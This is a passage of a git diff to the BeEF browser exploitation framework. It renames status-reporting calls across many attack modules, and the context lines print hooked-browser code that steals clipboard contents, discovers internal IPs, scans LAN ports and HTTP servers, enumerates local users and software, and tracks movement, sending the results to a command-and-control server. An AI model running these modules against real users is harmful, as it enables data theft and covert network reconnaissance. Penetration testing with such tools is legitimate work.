Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited. getResult = function(){ if(result.trim() != "") - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.status.success()); else - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.status.unknown()); div.innerHTML = ""; // Clean the current DOM's div result = ""; // Clear the result of the bloc tested for the next loop } @@ -108,7 +108,7 @@ beef.execute(function() { else // We have reach the last IP address to scan setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete document.body.removeChild(div); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.status.success()); }, timeout*2); } diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js index 6e58b31335..23ce0ab1ab 100644 --- a/modules/host/clipboard_theft/command.js +++ b/modules/host/clipboard_theft/command.js @@ -8,9 +8,9 @@ beef.execute(function() { try { var clipboard = clipboardData.getData("Text"); beef.debug("[Clipboard Theft] Success: Retrieved clipboard contents (" + clipboard.length + ' bytes)'); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboard, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboard, beef.status.success()); } catch (e) { beef.debug("[Clipboard Theft] Error: Could not retrieve clipboard contents"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=clipboardData.getData is not supported.", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=clipboardData.getData is not supported.", beef.status.error()); } }); diff --git a/modules/host/detect_airdroid/command.js b/modules/host/detect_airdroid/command.js index 182b889d6a..f72acf8cba 100644 --- a/modules/host/detect_airdroid/command.js +++ b/modules/host/detect_airdroid/command.js @@ -12,11 +12,11 @@ beef.execute(function() { img.src = "http://<%= @ipHost %>:<%= @port %>/theme/stock/images/ip_auth_refused.png"; img.onload = function() { if (this.width == 146 && this.height == 176) result = "Installed"; - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&airdroid='+result, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&airdroid='+result, beef.status.success()); dom.removeChild(this); } img.onerror = function() { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&airdroid='+result, beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&airdroid='+result, beef.status.error()); dom.removeChild(this); } dom.appendChild(img); diff --git a/modules/host/detect_coupon_printer/command.js b/modules/host/detect_coupon_printer/command.js index 497ec5b1ab..b346f4007d 100644 --- a/modules/host/detect_coupon_printer/command.js +++ b/modules/host/detect_coupon_printer/command.js @@ -8,7 +8,7 @@ beef.execute(function() { if (!beef.browser.hasWebSocket()) { beef.debug('[Detect Coupon Printer] Error: browser does not support WebSockets'); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.status.error()); } //var url = 'ws://127.0.0.1:2687'; @@ -33,7 +33,7 @@ beef.execute(function() { socket.onerror = function(error) { beef.debug('[Detect Coupon Printer] WebSocket Error: ' + JSON.stringify(error)); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not detect coupon printer", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=could not detect coupon printer", beef.status.error()); }; socket.onclose = function(event) { @@ -46,13 +46,13 @@ beef.execute(function() { var result = JSON.parse(event.data); if (result['GetVersion']) { beef.debug('[Detect Coupon Printer] Version: ' + result['GetVersion']); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "GetVersion=" + result['GetVersion'], beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "GetVersion=" + result['GetVersion'], beef.status.success()); } else if (result['GetDeviceID']) { beef.debug('[Detect Coupon Printer] Device ID: ' + result['GetDeviceID']); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "GetDeviceID=" + result['GetDeviceID'], beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "GetDeviceID=" + result['GetDeviceID'], beef.status.success()); } else if (result['CheckPrinter']) { beef.debug('[Detect Coupon Printer] Printer: ' + result['CheckPrinter']); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "CheckPrinter=" + result['CheckPrinter'], beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "CheckPrinter=" + result['CheckPrinter'], beef.status.success()); } } catch(e) { beef.debug('Could not parse WebSocket response JSON: ' + event.data); diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js index f1707124a3..e699595663 100644 --- a/modules/host/detect_cups/command.js +++ b/modules/host/detect_cups/command.js @@ -12,11 +12,11 @@ beef.execute(function() { img.src = "http://<%= @ipHost %>:<%= @port %>/images/cups-icon.png"; img.onload = function() { if (this.width == 128 && this.height == 128) result="Installed"; - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result, beef.status.success()); dom.removeChild(this); } img.onerror = function() { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result, beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto=http&ip=<%= @ipHost %>&port=<%= @port %>&cups='+result, beef.status.error()); dom.removeChild(this); } dom.appendChild(img); diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js index 3f1d7e0fd9..f8ca255822 100644 --- a/modules/host/detect_google_desktop/command.js +++ b/modules/host/detect_google_desktop/command.js @@ -9,8 +9,8 @@ beef.execute(function() { var dom = document.createElement('b'); var img = new Image; img.src = "http://127.0.0.1:4664/logo3.gif"; - img.onload = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Installed', beef.are.status_success());dom.removeChild(this); } - img.onerror = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Not Installed', beef.are.status_error());dom.removeChild(this); } + img.onload = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Installed', beef.status.success());dom.removeChild(this); } + img.onerror = function() { beef.net.send('<%= @command_url %>', <%= @command_id %>,'google_desktop=Not Installed', beef.status.error());dom.removeChild(this); } dom.appendChild(img); }); diff --git a/modules/host/detect_local_drives/command.js b/modules/host/detect_local_drives/command.js index fc041a3093..a5fa598fa4 100644 --- a/modules/host/detect_local_drives/command.js +++ b/modules/host/detect_local_drives/command.js @@ -8,7 +8,7 @@ beef.execute(function() { if (!("ActiveXObject" in window)) { beef.debug('[Detect Users] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.status.error()); return false; } @@ -32,7 +32,7 @@ beef.execute(function() { var result = detect_drive(drive); if (result) { beef.debug('[Detect Local Drives] Found drive: ' + drive); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found drive: ' + drive, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found drive: ' + drive, beef.status.success()); } } diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js index 1e8f782852..cba03f0057 100644 --- a/modules/host/detect_software/command.js +++ b/modules/host/detect_software/command.js @@ -8,7 +8,7 @@ beef.execute(function() { if (!("ActiveXObject" in window)) { beef.debug('[Detect Software] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.status.error()); return false; } diff --git a/modules/host/detect_users/command.js b/modules/host/detect_users/command.js index 148c071743..9c3fd24035 100644 --- a/modules/host/detect_users/command.js +++ b/modules/host/detect_users/command.js @@ -8,7 +8,7 @@ beef.execute(function() { if (!("ActiveXObject" in window)) { beef.debug('[Detect Users] Unspported browser'); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.status.error()); return false; } @@ -43,7 +43,7 @@ beef.execute(function() { if (home_dir == '') { beef.debug('[Detect Users] Could not find home directory'); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=could not find home directory', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=could not find home directory', beef.status.error()); return false; } @@ -64,7 +64,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } @@ -83,7 +83,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } @@ -96,7 +96,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } } @@ -110,7 +110,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } } @@ -124,7 +124,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } } @@ -138,7 +138,7 @@ beef.execute(function() { var result = detect_folder(home_dir + user); if (result) { beef.debug('[Detect Users] Found user: ' + user); - beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'result=Found user: ' + user, beef.status.success()); } } } diff --git a/modules/host/get_internal_ip_webrtc/command.js b/modules/host/get_internal_ip_webrtc/command.js index 8a3dfcca19..8514bd289e 100755 --- a/modules/host/get_internal_ip_webrtc/command.js +++ b/modules/host/get_internal_ip_webrtc/command.js @@ -32,7 +32,7 @@ beef.execute(function() { }; iceGatherer.onerror = function (e) { beef.debug("ICE Gatherer Failed"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "ICE Gatherer Failed", beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "ICE Gatherer Failed", beef.status.error()); }; } else { // Construct RTC peer connection @@ -61,15 +61,12 @@ beef.execute(function() { retResults(); }, function (e) { beef.debug("SDP Offer Failed"); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed", beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "SDP Offer Failed", beef.status.error()); }); }; function retResults(){ var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); - - // This is for the ARE, as this module is async, so we can't just return as we would in a normal sync way - get_internal_ip_webrtc_mod_output = [beef.are.status_success(), displayAddrs.join(",")]; } // Return results @@ -78,7 +75,7 @@ beef.execute(function() { else addrs[newAddr] = true; var displayAddrs = Object.keys(addrs).filter(function (k) { return addrs[k]; }); beef.debug("Found IPs: "+ displayAddrs.join(",")); - beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","), beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "IP is " + displayAddrs.join(","), beef.status.success()); } @@ -99,6 +96,6 @@ beef.execute(function() { }); } }else { - beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection", beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "Browser doesn't appear to support RTCPeerConnection", beef.status.error()); } }); diff --git a/modules/host/get_system_info_java/command.js b/modules/host/get_system_info_java/command.js index e12554d255..9b5742dd56 100644 --- a/modules/host/get_system_info_java/command.js +++ b/modules/host/get_system_info_java/command.js @@ -20,7 +20,7 @@ beef.execute(function() { output = document.getSystemInfo.getInfo(); if (output) { beef.debug('[Get System Info (Java)] Retrieved system info: ' + output); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"
"), beef.are.status_success()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info='+output.replace(/\n/g,"
"), beef.status.success()); beef.dom.detachApplet('getSystemInfo'); return; } @@ -28,7 +28,7 @@ beef.execute(function() { internal_counter = internal_counter + 5; if (internal_counter > timeout) { beef.debug('[Get System Info (Java)] Timeout after ' + timeout + ' seconds'); - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after ' + timeout + ' seconds', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'system_info=Timeout after ' + timeout + ' seconds', beef.status.error()); beef.dom.detachApplet('getSystemInfo'); return; } diff --git a/modules/host/physical_location_thirdparty/command.js b/modules/host/physical_location_thirdparty/command.js index 72c195729a..437fa5f40a 100644 --- a/modules/host/physical_location_thirdparty/command.js +++ b/modules/host/physical_location_thirdparty/command.js @@ -9,12 +9,12 @@ beef.execute(function() { var timeout = 10000; if (!beef.browser.hasCors()) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.status.error()); return; } beef.net.cors.request('GET', url, '', timeout, function(response) { beef.debug("[Get Physical Location (Third-Party] " + response.body); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + response.body, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=" + response.body, beef.status.success()); }); }); diff --git a/modules/misc/track_physical_movement/command.js b/modules/misc/track_physical_movement/command.js index d11be50fb9..b8bb523a7b 100644 --- a/modules/misc/track_physical_movement/command.js +++ b/modules/misc/track_physical_movement/command.js @@ -11,7 +11,7 @@ beef.execute(function() { if (!beef.hardware.isMobileDevice()) { beef.debug(result); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=' + result, beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'fail=' + result, beef.status.error()); } var historicMotion = { @@ -30,7 +30,7 @@ beef.execute(function() { status = new_status; beef.debug(new_status); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=' + new_status, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=' + new_status, beef.status.success()); } function updateStatus() { diff --git a/modules/misc/wordpress/wp.js b/modules/misc/wordpress/wp.js index 9226cc526b..990fd7d6ef 100644 --- a/modules/misc/wordpress/wp.js +++ b/modules/misc/wordpress/wp.js @@ -9,8 +9,8 @@ // Also, could have all that in as WP.prototype ? function log(data, status = null) { - if (status == 'error') { status = beef.are.status_error(); } - if (status == 'success') { status = beef.are.status_success(); } + if (status == 'error') { status = beef.status.error(); } + if (status == 'success') { status = beef.status.success(); } beef.net.send(beef_command_url, beef_command_id, data, status); beef.debug(data); diff --git a/modules/network/cross_origin_scanner_cors/command.js b/modules/network/cross_origin_scanner_cors/command.js index bb4049f0ca..3600453d87 100644 --- a/modules/network/cross_origin_scanner_cors/command.js +++ b/modules/network/cross_origin_scanner_cors/command.js @@ -14,7 +14,7 @@ beef.execute(function() { var wait = parseInt("<%= @wait %>", 10)*1000; if(!beef.browser.hasCors()) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support CORS', beef.status.error()); return; } @@ -48,7 +48,7 @@ beef.execute(function() { // set target IP range var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); if (range == null || range[1] == null) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.status.error()); return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 @@ -111,7 +111,7 @@ beef.execute(function() { 'if (response != null && response["status"] != 0) {' + 'beef.debug("[Cross-Origin Scanner (CORS)] Received response from '+url+': " + JSON.stringify(response));' + 'var title = response["body"].match("(.*?)<\\/title>"); if (title != null) title = title[1];' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto='+proto+'&ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response), beef.are.status_success());' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto='+proto+'&ip='+ips[i]+'&port='+ports[p]+'&status="+response["status"]+"&title="+title+"&response="+JSON.stringify(response), beef.status.success());' + '}' + '});' ); diff --git a/modules/network/cross_origin_scanner_flash/command.js b/modules/network/cross_origin_scanner_flash/command.js index a075f6920c..a482175e36 100644 --- a/modules/network/cross_origin_scanner_flash/command.js +++ b/modules/network/cross_origin_scanner_flash/command.js @@ -14,7 +14,7 @@ beef.execute(function() { // check if Flash is installed (not always reliable) if(!beef.browser.hasFlash()) { - beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.are.status_error()); + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=Browser does not support Flash', beef.status.error()); return; } @@ -48,7 +48,7 @@ beef.execute(function() { // set target IP range var range = ipRange.match('^([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\-([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))\.([0-9]|[1-9][0-9]|1([0-9][0-9])|2([0-4][0-9]|5[0-5]))$'); if (range == null || range[1] == null) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed IP range supplied", beef.status.error()); return; } // ipRange will be in the form of 192.168.0.1-192.168.0.254 @@ -123,7 +123,7 @@ beef.execute(function() { 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + 'if (data.match("securityErrorHandler")) {' + - ' beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive", beef.are.status_success());' + + ' beef.net.send("<%= @command_url %>", <%= @command_id %>, "ip="+host+"&status=alive", beef.status.success());' + '}' + 'if (!data.match("Hijacked Contents:")) return;' + @@ -135,7 +135,7 @@ beef.execute(function() { '}' + 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + - 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response, beef.are.status_success());' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response, beef.status.success());' + ' }', url); } catch(e) { beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); diff --git a/modules/network/detect_burp/command.js b/modules/network/detect_burp/command.js index 8f90ab1238..895d2519c3 100644 --- a/modules/network/detect_burp/command.js +++ b/modules/network/detect_burp/command.js @@ -18,10 +18,10 @@ beef.execute(function() { var response = FindProxyForURL('', ''); beef.debug("Response: " + response); beef.net.send("<%= @command_url %>", <%= @command_id %>, - "has_burp=true&response=" + response, beef.are.status_success()); + "has_burp=true&response=" + response, beef.status.success()); } catch(e) { beef.debug("Response: " + e.message); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_burp=false", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_burp=false", beef.status.error()); } } diff --git a/modules/network/fetch_port_scanner/command.js b/modules/network/fetch_port_scanner/command.js index ba4c9f521f..a7ee3198d2 100644 --- a/modules/network/fetch_port_scanner/command.js +++ b/modules/network/fetch_port_scanner/command.js @@ -62,7 +62,7 @@ beef.execute(function() { function fetch_scan(hostname, port_) { // check if port that is to be scanned is part of the banned list and report back to the BeEF server if (check_blocked(parseInt(port_))) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": is a blocked port and won't be scanned", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": is a blocked port and won't be scanned", beef.status.success()); return; } // define an AbortController to handle timeouts and to terminate connections [currently set to 5 seconds] @@ -84,14 +84,14 @@ beef.execute(function() { // If there is a status returned then Mozilla Firefox 68.5.0esr made a successful connection HTTP based or not // and or Chrome received HTTP based traffic. if (res.status === 0) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open", beef.status.success()); } }) // If an error occurred with the fetch this could be due to reaching the time out, the port being closed or non HTTP traffic. .catch(err => { // Alert BeEF if we are giving up due to the port not responding for N seconds if (signal.aborted === true) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": Giving up on port due to Timeout", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": Giving up on port due to Timeout", beef.status.success()); } else { // We need to capture how long it took to fail ASAP to get an idea on timing differences @@ -101,14 +101,14 @@ beef.execute(function() { if (isFirefox === true) { if (navigator.platform === 'Win32') { if ((end - start) > 600 ) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.status.success()); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but not HTTP", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but not HTTP", beef.status.success()); } } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.status.success()); } } else { @@ -118,23 +118,23 @@ beef.execute(function() { // // check if windows or linux if (navigator.platform === 'Win32') { if ((end - start) > 121 ) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.status.success()); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but does not communicate via HTTP", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but does not communicate via HTTP", beef.status.success()); } } else if (navigator.platform.toLowerCase().includes('linux')) { // this is for linux if ((end - start) < 11 ) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is closed", beef.status.success()); } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but does not communicate via HTTP", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, port_+": port is open but does not communicate via HTTP", beef.status.success()); } } else { - beef.net.send("<%= @command_url %>", <%= @command_id %>,"Module hasn't been tested against this browser.", beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>,"Module hasn't been tested against this browser.", beef.status.success()); } } } diff --git a/modules/network/get_http_servers/command.js b/modules/network/get_http_servers/command.js index 19bf9aa1de..ae5de8db87 100644 --- a/modules/network/get_http_servers/command.js +++ b/modules/network/get_http_servers/command.js @@ -15,7 +15,7 @@ beef.execute(function() { if(beef.browser.isO()) { beef.debug("[Favicon Scanner] Browser is not supported."); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=unsupported browser", beef.status.error()); return; } @@ -39,7 +39,7 @@ beef.execute(function() { } ports = sort_unique(target_ports); if (ports.length == 0) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no ports specified", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=no ports specified", beef.status.error()); return; } @@ -79,7 +79,7 @@ beef.execute(function() { } ips = sort_unique(target_ips); if (ips.length == 0) { - beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed target IP address(es) supplied", beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "fail=malformed target IP address(es) supplied", beef.status.error()); return; } } @@ -93,7 +93,7 @@ beef.execute(function() { img.src = proto+"://"+ip+":"+port+uri; img.onerror = function() { dom.removeChild(this); } img.onload = function() { - beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src), beef.are.status_success());dom.removeChild(this); + beef.net.send('<%= @command_url %>', <%= @command_id %>,'proto='+proto+'&ip='+ip+'&port='+port+"&url="+escape(this.src), beef.status.success());dom.removeChild(this); beef.debug("[Favicon Scanner] Found HTTP Server [" + escape(this.src) + "]"); } dom.appendChild(img); diff --git a/modules/network/get_ntop_network_hosts/command.js b/modules/network/get_ntop_network_hosts/command.js index 38104bc639..3e4dd07af0 100644 --- a/modules/network/get_ntop_network_hosts/command.js +++ b/modules/network/get_ntop_network_hosts/command.js @@ -20,10 +20,10 @@ beef.execute(function() { try { var result = JSON.stringify(ntopDict); beef.debug("[Get ntop Network Hosts] Success: Found ntop data (" + result.length + ' bytes)'); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto=http&ip=<%= @rhost %>&port=<%= @rport %>&data="+result, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto=http&ip=<%= @rhost %>&port=<%= @rport %>&data="+result, beef.status.success()); } catch(e) { beef.debug("[Get ntop Network Hosts] Error: Did not find ntop"); - beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=did not find ntop', beef.are.status_error()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result=did not find ntop', beef.status.error()); return; } } diff --git a/modules/network/get_proxy_servers_wpad/command.js b/modules/network/get_proxy_servers_wpad/command.js index b06631533e..ea84c809e3 100644 --- a/modules/network/get_proxy_servers_wpad/command.js +++ b/modules/network/get_proxy_servers_wpad/command.js @@ -18,7 +18,7 @@ beef.execute(function() { if (typeof FindProxyForURL === 'function') { var wpad = FindProxyForURL.toString(); beef.debug("[Get Proxy Servers] Success: Found wpad (" + wpad.length + ' bytes)'); - beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=true&wpad="+wpad, beef.are.status_success()); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=true&wpad="+wpad, beef.status.success()); } else { beef.debug("[Get Proxy Servers] Error: Did not find wpad"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "has_wpad=false"); @@ -38,7 +38,7 @@ beef.execute(function() { return; } beef.debug("[Get Proxy Servers] Found "+proxies.length+" proxies: " + 